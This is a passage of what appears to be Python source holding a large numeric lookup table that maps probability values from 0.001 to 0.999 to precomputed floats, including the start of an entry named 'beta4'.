0.6520843709606412, 0.323: 0.6520843709606412, 0.324: 0.6531423376907116, 0.325: 0.6531423376907116, 0.326: 0.6541966889300284, 0.327: 0.6541966889300284, 0.328: 0.655247469909402, 0.329: 0.655247469909402, 0.33: 0.6562947251470874, 0.331: 0.6562947251470874, 0.332: 0.6573384984654542, 0.333: 0.6573384984654542, 0.334: 0.6583788330071836, 0.335: 0.6583788330071836, 0.336: 0.6594157712510555, 0.337: 0.6594157712510555, 0.338: 0.6604493550272211, 0.339: 0.6604493550272211, 0.34: 0.6614796255321204, 0.341: 0.6614796255321204, 0.342: 0.6625066233429459, 0.343: 0.6625066233429459, 0.344: 0.663018907502609, 0.345: 0.6635303884317454, 0.346: 0.6640410710345586, 0.347: 0.6645509601791186, 0.348: 0.6650600606977741, 0.349: 0.6655683773875551, 0.35: 0.6660759150105728, 0.351: 0.6665826782944113, 0.352: 
0.6670886719325101, 0.353: 0.6675939005845511, 0.354: 0.6680983688768286, 0.355: 0.6686020814026354, 0.356: 0.6691050427226102, 0.357: 0.6696072573651206, 0.358: 0.6701087298265976, 0.359: 0.6706094645719106, 0.36: 0.6711094660346952, 0.361: 0.6716087386177194, 0.362: 0.6721072866932013, 0.363: 0.672605114603156, 0.364: 0.6731022266597249, 0.365: 0.673598627145503, 0.366: 0.6740943203138587, 0.367: 0.6745893103892513, 0.368: 0.6750836015675439, 0.369: 0.675577198016321, 0.37: 0.6760701038751914, 0.371: 0.6765623232560871, 0.372: 0.6770538602435703, 0.373: 0.6775447188951182, 0.374: 0.6780349032414232, 0.375: 0.6785244172866713, 0.376: 0.6790132650088415, 0.377: 0.6795014503599768, 0.378: 0.6799889772664565, 0.379: 0.6804758496292819, 0.38: 0.6809620713243425, 0.381: 0.6814476462026801, 0.382: 0.681932578090763, 0.383: 0.6824168707907288, 0.384: 0.6829005280806688, 0.385: 0.6833835537148568, 0.386: 0.6838659514240226, 0.387: 0.6843477249155834, 0.388: 0.6848288778739036, 0.389: 0.6853094139605289, 0.39: 0.6857893368144322, 0.391: 0.6862686500522506, 0.392: 0.686747357268519, 0.393: 0.6872254620359026, 0.394: 0.687702967905425, 0.395: 0.688179878406694, 0.396: 0.688656197048134, 0.397: 0.6891319273171946, 0.398: 0.6896070726805891, 0.399: 0.6900816365844882, 0.4: 0.6905556224547547, 0.401: 0.6910290336971351, 0.402: 0.6915018736974954, 0.403: 0.6919741458219966, 0.404: 0.6924458534173312, 0.405: 0.692916999810907, 0.406: 0.6933875883110421, 0.407: 0.693857622207189, 0.408: 0.6943271047701068, 0.409: 0.6947960392520569, 0.41: 0.6952644288870155, 0.411: 0.6957322768908354, 0.412: 0.6961995864614565, 0.413: 0.6966663607790745, 0.414: 0.6971326030063474, 0.415: 0.6975983162885411, 0.416: 0.6980635037537497, 0.417: 0.6985281685130438, 0.418: 0.6989923136606674, 0.419: 0.6994559422741938, 0.42: 0.699919057414716, 0.421: 0.7003816621269993, 0.422: 0.700843759439666, 0.423: 0.7013053523653541, 0.424: 0.7017664439008835, 0.425: 0.702227037027428, 0.426: 0.7026871347106631, 
0.427: 0.7031467399009421, 0.428: 0.7036058555334419, 0.429: 0.7040644845283315, 0.43: 0.7045226297909155, 0.431: 0.70498029421181, 0.432: 0.7054374806670598, 0.433: 0.7058941920183321, 0.434: 0.7063504311130315, 0.435: 0.7068062007844735, 0.436: 0.7072615038520105, 0.437: 0.7077163431211877, 0.438: 0.7081707213838986, 0.439: 0.7086246414185028, 0.44: 0.7090781059899909, 0.441: 0.7099836797374939, 0.442: 0.7099836797374939, 0.443: 0.7108874644840137, 0.444: 0.7108874644840137, 0.445: 0.7117894818819261, 0.446: 0.7117894818819261, 0.447: 0.7126897533826833, 0.448: 0.7126897533826833, 0.449: 0.713588300241041, 0.45: 0.713588300241041, 0.451: 0.7144851435191959, 0.452: 0.7144851435191959, 0.453: 0.7153803040908813, 0.454: 0.7153803040908813, 0.455: 0.7162738026453555, 0.456: 0.7162738026453555, 0.457: 0.7171656596913379, 0.458: 0.7171656596913379, 0.459: 0.7180558955609, 0.46: 0.7180558955609, 0.461: 0.7189445304132334, 0.462: 0.7189445304132334, 0.463: 0.7198315842384235, 0.464: 0.7198315842384235, 0.465: 0.7207170768611065, 0.466: 0.7207170768611065, 0.467: 0.7216010279440989, 0.468: 0.7216010279440989, 0.469: 0.7220424315094723, 0.47: 0.7224834569919608, 0.471: 0.7229241068054837, 0.472: 0.7233643833544984, 0.473: 0.7238042890341194, 0.474: 0.7242438262302121, 0.475: 0.7246829973195117, 0.476: 0.7251218046697115, 0.477: 0.7255602506395729, 0.478: 0.7259983375790399, 0.479: 0.7264360678293225, 0.48: 0.7268734437230076, 0.481: 0.727310467584157, 0.482: 0.7277471417284112, 0.483: 0.7281834684630808, 0.484: 0.7286194500872518, 0.485: 0.7290550888918857, 0.486: 0.7294903871599046, 0.487: 0.729925347166297, 0.488: 0.7303599711782167, 0.489: 0.7307942614550686, 0.49: 0.7312282202486056, 0.491: 0.731661849803029, 0.492: 0.7320951523550754, 0.493: 0.7325281301341102, 0.494: 0.7329607853622234, 0.495: 0.7333931202543144, 0.496: 0.7338251370181907, 0.497: 0.7342568378546537, 0.498: 0.7346882249575918, 0.499: 0.7351193005140648, 0.5: 0.7355500667043946, 0.501: 
0.7359805257022629, 0.502: 0.736410679674782, 0.503: 0.7368405307825945, 0.504: 0.7372700811799572, 0.505: 0.7376993330148248, 0.506: 0.7381282884289455, 0.507: 0.7385569495579267, 0.508: 0.7389853185313442, 0.509: 0.7394133974728119, 0.51: 0.7398411885000629, 0.511: 0.7402686937250471, 0.512: 0.7406959152540055, 0.513: 0.741122855187553, 0.514: 0.7415495156207655, 0.515: 0.7419758986432556, 0.516: 0.7424020063392585, 0.517: 0.7428278407877171, 0.518: 0.7432534040623593, 0.519: 0.7436786982317708, 0.52: 0.7441037253594894, 0.521: 0.7445284875040802, 0.522: 0.7449529867192101, 0.523: 0.7453772250537332, 0.524: 0.745801204551769, 0.525: 0.7462249272527776, 0.526: 0.7466483951916411, 0.527: 0.7470716103987431, 0.528: 0.7474945749000428, 0.529: 0.74791729071716, 0.53: 0.748339759867439, 0.531: 0.7487619843640451, 0.532: 0.7491839662160209, 0.533: 0.7500272100021748, 0.534: 0.7504484759345688, 0.535: 0.750869507218928, 0.536: 0.7512903058448795, 0.537: 0.7517108737983949, 0.538: 0.7521312130618715, 0.539: 0.7525513256141956, 0.54: 0.7529712134308282, 0.541: 0.7533908784838732, 0.542: 0.7538103227421544, 0.543: 0.754229548171289, 0.544: 0.7546485567337676, 0.545: 0.7550673503890208, 0.546: 0.7554859310934963, 0.547: 0.7559043008007363, 0.548: 0.7563224614614448, 0.549: 0.7567404150235721, 0.55: 0.7571581634323776, 0.551: 0.7575757086305109, 0.552: 0.7579930525580765, 0.553: 0.7584101971527252, 0.554: 0.7588271443497, 0.555: 0.7592438960819415, 0.556: 0.7596604542801327, 0.557: 0.7600768208727952, 0.558: 0.7604929977863476, 0.559: 0.7609089869451785, 0.56: 0.7613247902717337, 0.561: 0.7617404096865756, 0.562: 0.7621558471084606, 0.563: 0.7621558471084606, 0.564: 0.7625711044544199, 0.565: 0.7629861836398162, 0.566: 0.7634010865784351, 0.567: 0.7638158151825467, 0.568: 0.7642303713629843, 0.569: 0.7646447570292122, 0.57: 0.7650589740894096, 0.571: 0.7654730244505318, 0.572: 0.7658869100183937, 0.573: 0.7663006326977352, 0.574: 0.7667141943923046, 0.575: 0.7671275970049194, 
0.576: 0.767540842437554, 0.577: 0.7679539325914064, 0.578: 0.7683668693669741, 0.579: 0.7687796546641252, 0.58: 0.7691922903821782, 0.581: 0.7696047784199711, 0.582: 0.7700171206759436, 0.583: 0.7704293190482026, 0.584: 0.7708413754346044, 0.585: 0.7712532917328274, 0.586: 0.7716650698404466, 0.587: 0.7720767116550123, 0.588: 0.7724882190741225, 0.589: 0.7728995939955002, 0.59: 0.773310838317069, 0.591: 0.773721953937033, 0.592: 0.7741329427539492, 0.593: 0.7745438066668062, 0.594: 0.7749545475750999, 0.595: 0.775365167378917, 0.596: 0.7757756679790029, 0.597: 0.7761860512768476, 0.598: 0.7765963191747626, 0.599: 0.7770064735759555, 0.6: 0.7774165163846163, 0.601: 0.7778264495059879, 0.602: 0.7782362748464531, 0.603: 0.7786459943136105, 0.604: 0.7790556098163555, 0.605: 0.7794651232649613, 0.606: 0.7798745365711616, 0.607: 0.7802838516482298, 0.608: 0.7806930704110627, 0.609: 0.7811021947762602, 0.61: 0.7815112266622087, 0.611: 0.7819201679891684, 0.612: 0.7823290206793507, 0.613: 0.7827377866570054, 0.614: 0.7831464678485047, 0.615: 0.7835550661824275, 0.616: 0.7839635835896478, 0.617: 0.7843720220034165, 0.618: 0.7847803833594487, 0.619: 0.7851886695960131, 0.62: 0.7855968826540182, 0.621: 0.786005024477099, 0.622: 0.786413097011708, 0.623: 0.7868211022072011, 0.624: 0.7872290420159306, 0.625: 0.7876369183933362, 0.626: 0.7880447332980294, 0.627: 0.7884524886918934, 0.628: 0.7888601865401708, 0.629: 0.7892678288115562, 0.63: 0.7896754174782934, 0.631: 0.7900829545162642, 0.632: 0.7904904419050889, 0.633: 0.7908978816282177, 0.634: 0.791305275673029, 0.635: 0.7917126260309262, 0.636: 0.7921199346974361, 0.637: 0.7925272036723071, 0.638: 0.7929344349596062, 0.639: 0.7933416305678247, 0.64: 0.7937487925099744, 0.641: 0.7941559228036911, 0.642: 0.7945630234713377, 0.643: 0.794970096540108, 0.644: 0.7953771440421287, 0.645: 0.79578416801457, 0.646: 0.796191170499746, 0.647: 0.7965981535452262, 0.648: 0.7970051192039411, 0.649: 0.7974120695342927, 0.65: 
0.7978190066002653, 0.651: 0.7982259324715344, 0.652: 0.7986328492235822, 0.653: 0.7990397589378074, 0.654: 0.7994466637016426, 0.655: 0.7998535656086684, 0.656: 0.8002604667587291, 0.657: 0.8006673692580524, 0.658: 0.8014811867620207, 0.659: 0.8018881060121092, 0.66: 0.8022950351025896, 0.661: 0.8027019761734091, 0.662: 0.8031089313716283, 0.663: 0.803515902851549, 0.664: 0.803922892774841, 0.665: 0.8043299033106696, 0.666: 0.8047369366358303, 0.667: 0.805143994934877, 0.668: 0.805551080400256, 0.669: 0.80595819523244, 0.67: 0.8063653416400667, 0.671: 0.8067725218400744, 0.672: 0.8071797380578409, 0.673: 0.807586992527326, 0.674: 0.8079942874912138, 0.675: 0.8084016252010561, 0.676: 0.8088090079174157, 0.677: 0.8092164379100194, 0.678: 0.8096239174579022, 0.679: 0.8100314488495599, 0.68: 0.8104390343831015, 0.681: 0.8108466763664051, 0.682: 0.8112543771172726, 0.683: 0.8116621389635872, 0.684: 0.8120699642434749, 0.685: 0.8124778553054687, 0.686: 0.812885814508668, 0.687: 0.8132938442229097, 0.688: 0.8132938442229097, 0.689: 0.8137019468289306, 0.69: 0.8141101247185454, 0.691: 0.8145183802948126, 0.692: 0.8149267159722117, 0.693: 0.8153351341768218, 0.694: 0.8157436373464985, 0.695: 0.8161522279310555, 0.696: 0.8165609083924505, 0.697: 0.8169696812049714, 0.698: 0.8173785488554234, 0.699: 0.817787513843319, 0.7: 0.8181965786810788, 0.701: 0.81860574589422, 0.702: 0.8190150180215611, 0.703: 0.8194243976154219, 0.704: 0.8198338872418283, 0.705: 0.8202434894807192, 0.706: 0.8206532069261581, 0.707: 0.8210630421865471, 0.708: 0.8214729978848386, 0.709: 0.8218830766587641, 0.71: 0.8222932811610467, 0.711: 0.8227036140596329, 0.712: 0.8231140780379193, 0.713: 0.8235246757949855, 0.714: 0.8239354100458285, 0.715: 0.8243462835216071, 0.716: 0.8247572989698749, 0.717: 0.8251684591548364, 0.718: 0.8255797668575894, 0.719: 0.8259912248763827, 0.72: 0.8264028360268721, 0.721: 0.82681460314238, 0.722: 0.8272265290741677, 0.723: 0.8276386166916927, 0.724: 0.8280508688828925, 
0.725: 0.8284632885544565, 0.726: 0.8288758786321117, 0.727: 0.829288642060904, 0.728: 0.829701581805491, 0.729: 0.8301147008504408, 0.73: 0.8305280022005292, 0.731: 0.8309414888810429, 0.732: 0.8313551639380885, 0.733: 0.8317690304389093, 0.734: 0.832183091472205, 0.735: 0.8325973501484578, 0.736: 0.8330118096002533, 0.737: 0.8334264729826311, 0.738: 0.8338413434734111, 0.739: 0.8342564242735487, 0.74: 0.8346717186074828, 0.741: 0.8350872297234988, 0.742: 0.835502960894084, 0.743: 0.8359189154163078, 0.744: 0.836335096612192, 0.745: 0.8367515078290969, 0.746: 0.8371681524401079, 0.747: 0.8375850338444296, 0.748: 0.8380021554677974, 0.749: 0.8384195207628786, 0.75: 0.8388371332096949, 0.751: 0.839254996316041, 0.752: 0.8396731136179256, 0.753: 0.84009148868, 0.754: 0.8405101250960147, 0.755: 0.8409290264892669, 0.756: 0.8413481965130679, 0.757: 0.8417676388512205, 0.758: 0.8421873572184837, 0.759: 0.8426073553610762, 0.76: 0.8430276370571695, 0.761: 0.8434482061173915, 0.762: 0.8438690663853534, 0.763: 0.8442902217381587, 0.764: 0.844711676086954, 0.765: 0.8451334333774695, 0.766: 0.8455554975905712, 0.767: 0.8464005628871285, 0.768: 0.8468235721131693, 0.769: 0.8472469045481636, 0.77: 0.8476705643574003, 0.771: 0.8480945557448651, 0.772: 0.8485188829538903, 0.773: 0.8489435502677997, 0.774: 0.8493685620105581, 0.775: 0.8497939225474583, 0.776: 0.8502196362858021, 0.777: 0.8506457076755949, 0.778: 0.851072141210278, 0.779: 0.8514989414274313, 0.78: 0.8519261129095379, 0.781: 0.8523536602847411, 0.782: 0.852781588227601, 0.783: 0.853209901459908, 0.784: 0.8536386047514757, 0.785: 0.854067702920964, 0.786: 0.8544972008367249, 0.787: 0.8549271034176584, 0.788: 0.8553574156340878, 0.789: 0.8557881425086524, 0.79: 0.8562192891172231, 0.791: 0.8566508605898439, 0.792: 0.8570828621116668, 0.793: 0.857515298923939, 0.794: 0.8579481763250044, 0.795: 0.8583814996712956, 0.796: 0.858815274378404, 0.797: 0.8592495059221108, 0.798: 0.8596841998395001, 0.799: 0.8601193617300558, 
0.8: 0.8605549972567834, 0.801: 0.860991112147404, 0.802: 0.8614277121955056, 0.803: 0.8618648032617768, 0.804: 0.862302391275245, 0.805: 0.8627404822345398, 0.806: 0.8631790822091976, 0.807: 0.8636181973409898, 0.808: 0.8640578338452893, 0.809: 0.8644979980124431, 0.81: 0.8649386962092287, 0.811: 0.8653799348802875, 0.812: 0.8658217205496228, 0.813: 0.8658217205496228, 0.814: 0.8662640598221462, 0.815: 0.8667069593852249, 0.816: 0.8671504260102983, 0.817: 0.8675944665545221, 0.818: 0.8680390879624442, 0.819: 0.868484297267744, 0.82: 0.8689301015949923, 0.821: 0.8693765081614677, 0.822: 0.8698235242790151, 0.823: 0.8702711573559507, 0.824: 0.8707194148990185, 0.825: 0.8711683045153991, 0.826: 0.8716178339147624, 0.827: 0.8720680109113631, 0.828: 0.8725188434262364, 0.829: 0.8729703394893837, 0.83: 0.8734225072420762, 0.831: 0.8738753549391953, 0.832: 0.8743288909516078, 0.833: 0.8747831237686716, 0.834: 0.8752380620007343, 0.835: 0.8756937143817536, 0.836: 0.8761500897719717, 0.837: 0.8766071971606508, 0.838: 0.8770650456689086, 0.839: 0.8775236445525976, 0.84: 0.8779830032053098, 0.841: 0.8784431311614472, 0.842: 0.87890403809934, 0.843: 0.8793657338445258, 0.844: 0.8798282283730703, 0.845: 0.8802915318150021, 0.846: 0.8807556544578454, 0.847: 0.8812206067502519, 0.848: 0.8816863993057594, 0.849: 0.8821530429066325, 0.85: 0.8826205485078215, 0.851: 0.8830889272410779, 0.852: 0.8835581904191525, 0.853: 0.8840283495401449, 0.854: 0.8844994162919538, 0.855: 0.8849714025569239, 0.856: 0.8854443204165868, 0.857: 0.885918182156552, 0.858: 0.8863930002715902, 0.859: 0.8868687874708521, 0.86: 0.8873455566832378, 0.861: 0.8878233210629703, 0.862: 0.8883020939953478, 0.863: 0.8887818891026656, 0.864: 0.8892627202503346, 0.865: 0.889744601553215, 0.866: 0.8902275473821786, 0.867: 0.8907115723708232, 0.868: 0.89119669142251, 0.869: 0.8916829197175793, 0.87: 0.8921702727208111, 0.871: 0.8926587661891863, 0.872: 0.8931484161798863, 0.873: 0.8936392390585964, 0.874: 
0.894131251508071, 0.875: 0.8946244705370525, 0.876: 0.8951189134894744, 0.877: 0.895614598054019, 0.878: 0.8961115422740262, 0.879: 0.8966097645577332, 0.88: 0.8971092836889663, 0.881: 0.8976101188381802, 0.882: 0.8981122895739193, 0.883: 0.8986158158747501, 0.884: 0.8996270172107048, 0.885: 0.9001347343668029, 0.886: 0.9006438913571762, 0.887: 0.9011545104060396, 0.888: 0.9016666142295524, 0.889: 0.9021802260514752, 0.89: 0.9026953696194422, 0.891: 0.9032120692219234, 0.892: 0.9037303497058868, 0.893: 0.9042502364952025, 0.894: 0.9047717556098503, 0.895: 0.9052949336859292, 0.896: 0.9058197979965497, 0.897: 0.9063463764736668, 0.898: 0.9068746977307942, 0.899: 0.907404791086872, 0.9: 0.9079366865910729, 0.901: 0.9084704150488361, 0.902: 0.9090060080490603, 0.903: 0.9095434979925788, 0.904: 0.910082918121967, 0.905: 0.910624302552747, 0.906: 0.9111676863061664, 0.907: 0.9117131053434584, 0.908: 0.9122605966018961, 0.909: 0.9128101980325561, 0.91: 0.9133619486400298, 0.911: 0.9139158885240886, 0.912: 0.9144720589236099, 0.913: 0.915030502262612, 0.914: 0.9155912621989051, 0.915: 0.9161543836751155, 0.916: 0.916719912972671, 0.917: 0.9172878977685587, 0.918: 0.9178583871953134, 0.919: 0.9184314319042856, 0.92: 0.91900708413253, 0.921: 0.9195853977735284, 0.922: 0.9201664284519813, 0.923: 0.920750233602964, 0.924: 0.921336872555888, 0.925: 0.9219264066234327, 0.926: 0.9225188991959647, 0.927: 0.9231144158417716, 0.928: 0.9237130244135927, 0.929: 0.9243147951619725, 0.93: 0.9249198008559241, 0.931: 0.9255281169114625, 0.932: 0.9261398215287105, 0.933: 0.9267549958382909, 0.934: 0.9273737240577397, 0.935: 0.92799609365872, 0.936: 0.928622195546219, 0.937: 0.9292521242504579, 0.938: 0.9292521242504579, 0.939: 0.9298859781328668, 0.94: 0.9305238596073836, 0.941: 0.931165875378347, 0.942: 0.9318121366967276, 0.943: 0.9324627596362657, 0.944: 0.9331178653916035, 0.945: 0.933777580600472, 0.946: 0.9344420376924215, 0.947: 0.9351113752667268, 0.948: 0.9357857385026679, 
0.949: 0.9364652796054211, 0.95: 0.937150158291647, 0.951: 0.9378405423189374, 0.952: 0.9385366080642967, 0.953: 0.9392385411571911, 0.954: 0.9399465371734812, 0.955: 0.9406608023978891, 0.956: 0.9413815546631431, 0.957: 0.9421090242753994, 0.958: 0.9428434550374909, 0.959: 0.9435851053822989, 0.96: 0.9443342496316968, 0.961: 0.9450911793978888, 0.962: 0.945856205148016, 0.963: 0.9466296579552712, 0.964: 0.9474118914646792, 0.965: 0.9482032841068802, 0.966: 0.9490042415986161, 0.967: 0.9498151997772327, 0.968: 0.9506366278252294, 0.969: 0.9514690319520888, 0.97: 0.9523129596160298, 0.971: 0.9531690043849087, 0.972: 0.9540378115592142, 0.973: 0.9549200847079529, 0.974: 0.9558165933058685, 0.975: 0.9567281817072483, 0.976: 0.9576557797538003, 0.977: 0.9586004153958916, 0.978: 0.9595632298144803, 0.979: 0.9605454956773251, 0.98: 0.961548639362179, 0.981: 0.9625742682534052, 0.982: 0.9636242046045878, 0.983: 0.9647005280060533, 0.984: 0.9658056292907885, 0.985: 0.9669422798859362, 0.986: 0.9681137223883007, 0.987: 0.969323790886672, 0.988: 0.9705770739195563, 0.989: 0.9718791401261718, 0.99: 0.9732368588572403, 0.991: 0.9746588696894386, 0.992: 0.9761562952386755, 0.993: 0.9777438717615068, 0.994: 0.9794418425593265, 0.995: 0.9812793568951739, 0.996: 0.9833011613491072, 0.997: 0.9855825957791874, 0.998: 0.9882705907872608, 0.999: 0.9917445572122447}, # skipcq: FLK-E231, FLK-E501 'beta4': {0.001: 0.00019998005804071128, 0.002: 0.0004002204045574647, 0.003: 0.0006006213287669104, 0.004: 0.0008011831206943514, 0.005: 0.0010019060711810082, 0.006: 0.0012027904718907045, 0.007: 0.0014038366153058955, 0.008: 0.001605044794729051, 0.009: 0.0018064153042957605, 0.01: 0.002007948438980501, 0.011: 0.0022096444945776577, 0.012: 0.002411503767724943, 0.013: 0.0026135265559143867, 0.014: 0.0028157131574584517, 0.015: 0.003018063871538153, 0.016: 0.003220578998168856, 0.017: 0.0034232588382341047, 0.018: 0.0036261036934598237, 0.019: 0.0038291138664526846, 0.02: 0.00403228966066378, 
0.021: 0.0042356313804248705, 0.022: 0.004439139330928271, 0.023: 0.004642813818244524, 0.024: 0.004846655149330454, 0.025: 0.0050506636320080825, 0.026: 0.005254839574995085, 0.027: 0.005459183287890954, 0.028: 0.005663695081191499, 0.029: 0.005868375266289406, 0.03: 0.006073224155463766, 0.031: 0.006278242061907052, 0.032: 0.0064834292997097125, 0.033: 0.00668878618387534, 0.034: 0.006894313030321713, 0.035: 0.007100010155878011, 0.036: 0.007305877878297563, 0.037: 0.007511916516250114, 0.038: 0.007718126389340973, 0.039: 0.007924507818096463, 0.04: 0.008131061123992048, 0.041: 0.008337786629420182, 0.042: 0.008544684657735183, 0.043: 0.008751755533227578, 0.044: 0.008958999581128573, 0.045: 0.009166417127646475, 0.046: 0.009374008499919767, 0.047: 0.009581774026066928, 0.048: 0.009789714035155795, 0.049: 0.009997828857236844, 0.05: 0.010206118823319751, 0.051: 0.010414584265399651, 0.052: 0.010623225516449099, 0.053: 0.010832042910421927, 0.054: 0.01104103678226016, 0.055: 0.011250207467897311, 0.056: 0.01145955530427429, 0.057: 0.011669080629309344, 0.058: 0.011878783781943972, 0.059: 0.012088665102121407, 0.06: 0.012298724930791, 0.061: 0.012508963609927542, 0.062: 0.012719381482517458, 0.063: 0.012929978892580032, 0.064: 0.013140756185157917, 0.065: 0.01335171370632152, 0.066: 0.013562851803192999, 0.067: 0.013774170823917384, 0.068: 0.013985671117698075, 0.069: 0.014197353034783821, 0.07: 0.014409216926473003, 0.071: 0.014621263145133328, 0.072: 0.01483349204417878, 0.073: 0.015045903978106762, 0.074: 0.015258499302476039, 0.075: 0.015471278373926986, 0.076: 0.01568424155017064, 0.077: 0.015897389190005436, 0.078: 0.01611072165333038, 0.079: 0.016324239301124484, 0.08: 0.01653794249546798, 0.081: 0.016751831599545276, 0.082: 0.016965906977645433, 0.083: 0.017180168995179712, 0.084: 0.017394618018656167, 0.085: 0.01760925441572233, 0.086: 0.017824078555136243, 0.087: 0.018039090806796672, 0.088: 0.018254291541735704, 0.089: 0.018469681132123033, 0.09: 
0.018685259951271547, 0.091: 0.018901028373641923, 0.092: 0.019116986774852813, 0.093: 0.0193331355316856, 0.094: 0.019549475022072865, 0.095: 0.019766005625124154, 0.096: 0.01998272772112894, 0.097: 0.020199641691539552, 0.098: 0.020416747919000798, 0.099: 0.020634046787345282, 0.1: 0.020851538681598076, 0.101: 0.02106922398798212, 0.102: 0.021287103093923336, 0.103: 0.021505176388065678, 0.104: 0.021723444260250448, 0.105: 0.021941907101542327, 0.106: 0.02216056530424554, 0.107: 0.022379419261869652, 0.108: 0.022598469369177705, 0.109: 0.02281771602215995, 0.11: 0.023037159618063352, 0.111: 0.02325680055536784, 0.112: 0.023476639233836444, 0.113: 0.023696676054460984, 0.114: 0.023916911419520945, 0.115: 0.024137345732567095, 0.116: 0.024357979398413047, 0.117: 0.024578812823170336, 0.118: 0.024799846414236285, 0.119: 0.0250210805802904, 0.12: 0.025242515731326447, 0.121: 0.0254641522786387, 0.122: 0.02568599063482206, 0.123: 0.025908031213808094, 0.124: 0.026130274430829985, 0.125: 0.02635272070246037, 0.126: 0.02657537044660458, 0.127: 0.026798224082502403, 0.128: 0.027021282030743367, 0.129: 0.027244544713269807, 0.13: 0.02746801255337056, 0.131: 0.027691685975712928, 0.132: 0.027915565406323926, 0.133: 0.028139651272603407, 0.134: 0.028363944003336493, 0.135: 0.028588444028694697, 0.136: 0.028813151780242848, 0.137: 0.029038067690943345, 0.138: 0.029263192195163414, 0.139: 0.02948852572869147, 0.14: 0.029714068728718238, 0.141: 0.02993982163386695, 0.142: 0.030165784884191738, 0.143: 0.03039195892118548, 0.144: 0.03061834418777528, 0.145: 0.03084494112834553, 0.146: 0.031071750188734898, 0.147: 0.03129877181624225, 0.148: 0.031526006459636755, 0.149: 0.03175345456917217, 0.15: 0.0319811165965629, 0.151: 0.032208992995031674, 0.152: 0.03243708421929227, 0.153: 0.03266539072555246, 0.154: 0.0328939129715389, 0.155: 0.03312265141649033, 0.156: 0.033351606521157984, 0.157: 0.03358077874784467, 0.158: 0.033810168560369044, 0.159: 0.0340397764240995, 0.16: 
0.034269602805954924, 0.161: 0.03449964817442163, 0.162: 0.03472991299952519, 0.163: 0.034960397752885806, 0.164: 0.035191102907694734, 0.165: 0.0354220289387298, 0.166: 0.035653176322351626, 0.167: 0.03588454553653539, 0.168: 0.036116137060853704, 0.169: 0.036347951376499765, 0.17: 0.036579988966282576, 0.171: 0.03681225031465444, 0.172: 0.037044735907685276, 0.173: 0.03727744623310381, 0.174: 0.03751038178028295, 0.175: 0.03774354304026518, 0.176: 0.0379769305057472, 0.177: 0.038210544671111485, 0.178: 0.03844438603241455, 0.179: 0.038678455087416734, 0.18: 0.03891275233556041, 0.181: 0.03914727827800287, 0.182: 0.03938203341761945, 0.183: 0.03961701825899733, 0.184: 0.039852233308465296, 0.185: 0.04008767907407873, 0.186: 0.040323356065650816, 0.187: 0.04055926479473852, 0.188: 0.040795405774665665, 0.189: 0.041031779520537034, 0.19: 0.04126838654921838, 0.191: 0.041505227379378486, 0.192: 0.041742302531467566, 0.193: 0.04197961252775981, 0.194: 0.04221715789232681, 0.195: 0.042454939151061806, 0.196: 0.04269295683169627, 0.197: 0.042931211463792876, 0.198: 0.043169703578770334, 0.199: 0.04340843370990257, 0.2: 0.04364740239231127, 0.201: 0.04388661016301945, 0.202: 0.044126057560915144, 0.203: 0.044365745126777316, 0.204: 0.04460567340329231, 0.205: 0.04484584293505811, 0.206: 0.04508625426858496, 0.207: 0.04532690795231201, 0.208: 0.04556780453662512, 0.209: 0.0458089445738521, 0.21: 0.04605032861826507, 0.211: 0.04629195722611862, 0.212: 0.04653383095563195, 0.213: 0.046775950367015554, 0.214: 0.04701831602246576, 0.215: 0.047260928486195036, 0.216: 0.047503788324414306, 0.217: 0.047746896105369814, 0.218: 0.04799025239934135, 0.219: 0.04823385777863669, 0.22: 0.04847771281762821, 0.221: 0.04872181809275573, 0.222: 0.0489661741825225, 0.223: 0.049210781667516384, 0.224: 0.049455641130425124, 0.225: 0.049700753156030404, 0.226: 0.04994611833123204, 0.227: 0.05019173724506154, 0.228: 0.05043761048866911, 0.229: 0.05068373865537025, 0.23: 0.0509301223406147, 
0.231: 0.051176762142036605, 0.232: 0.051423658659436294, 0.233: 0.05167081249480347, 0.234: 0.05191822425233639, 0.235: 0.05216589453842663, 0.236: 0.05241382396170518, 0.237: 0.05266201313301463, 0.238: 0.052910462665459124, 0.239: 0.05315917317438074, 0.24: 0.05340814527739983, 0.241: 0.05365737959440284, 0.242: 0.0539068767475747, 0.243: 0.05415663736139265, 0.244: 0.05440666206264523, 0.245: 0.054656951480446636, 0.246: 0.05490750624623935, 0.247: 0.05515832699382815, 0.248: 0.05540941435935247, 0.249: 0.05566076898134175, 0.25: 0.055912391500690835, 0.251: 0.056164282560705575, 0.252: 0.056416442807086076, 0.253: 0.05666887288794967, 0.254: 0.056921573453853076, 0.255: 0.05717454515779148, 0.256: 0.05742778865521043, 0.257: 0.05768130460403543, 0.258: 0.05793509366466473, 0.259: 0.05818915649999461, 0.26: 0.05844349377541235, 0.261: 0.05869810615884815, 0.262: 0.058952994320748325, 0.263: 0.05920815893411248, 0.264: 0.05946360067448175, 0.265: 0.05971932021999787, 0.266: 0.059975318251359794, 0.267: 0.060231595451876695, 0.268: 0.06048815250747665, 0.269: 0.060744990106690246, 0.27: 0.061002108940712695, 0.271: 0.061259509703376555, 0.272: 0.061517193091183864, 0.273: 0.06177515980332206, 0.274: 0.0620334105416575, 0.275: 0.06229194601078976, 0.276: 0.06255076691801634, 0.277: 0.06280987397338685, 0.278: 0.0630692678896992, 0.279: 0.06332894938251532, 0.28: 0.0635889191701748, 0.281: 0.06384917797382073, 0.282: 0.06410972651739967, 0.283: 0.06437056552768416, 0.284: 0.06463169573428154, 0.285: 0.06489311786967034, 0.286: 0.06515483266918098, 0.287: 0.06541684087103565, 0.288: 0.06567914321635825, 0.289: 0.06594174044918945, 0.29: 0.06620463331649956, 0.291: 0.0664678225682073, 0.292: 0.06673130895719456, 0.293: 0.06699509323932473, 0.294: 0.06725917617345606, 0.295: 0.06752355852145142, 0.296: 0.06778824104820663, 0.297: 0.06805322452166121, 0.298: 0.06831850971281445, 0.299: 0.06858409739574531, 0.3: 0.0688499883476261, 0.301: 0.06911618334873397, 0.302: 
